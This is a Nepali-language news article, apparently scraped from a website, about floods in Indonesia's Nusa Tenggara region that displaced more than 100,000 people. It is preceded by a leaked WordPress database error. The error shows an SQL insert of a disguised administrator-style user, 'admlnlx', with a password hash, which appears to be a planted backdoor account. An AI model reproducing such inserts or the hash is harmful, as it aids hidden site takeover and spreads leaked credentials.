WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWuXwfVthvUOuwbo9gw0wmUPEIhb/G/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:45:09', '', 'admlnlx', 'admlnlx')
जाकर्ता ,पुस ९-
इन्डोनेसियाको पश्चिमी क्षेत्र नुसा तेङगारामा आएको ठूलो बाढीका कारण हालसम्म एक लाखभन्दा बढी मानिस विस्थापित भएका छन्। प्रकोपका कारण शनिबार मुख्य विमानस्थल पनि बन्द गरिएको छ।
बाढीले करिब २० हजार घर, ६० भन्दा बढी स्वास्थ्य संस्था र दुइटा पुलमा क्षति पुर्याएको छ। भीषण बाढी आएपछि सञ्चार र विद्युत सेवा समेत अवरुद्ध भएको राष्ट्रिय विपत व्यवस्थापन निकायका प्रवक्ता सुटोपो पुर्वो नुग्रोहले बताए।

बाढी नियन्त्रणमा आइसकेको छैन। यसकारण प्रभावितहरुको संख्या बढ्न सक्ने अधिकारीहरुले बताएका छन्। प्रहरी, सेना, उद्धारकर्मीहरु उद्धार र राहतमा जुटेका छन्।सरकारले आगामी जनवरी ४ सम्मका लागि आपतकालीन अवस्था घोषणा पनि गरेको छ।एजेन्सी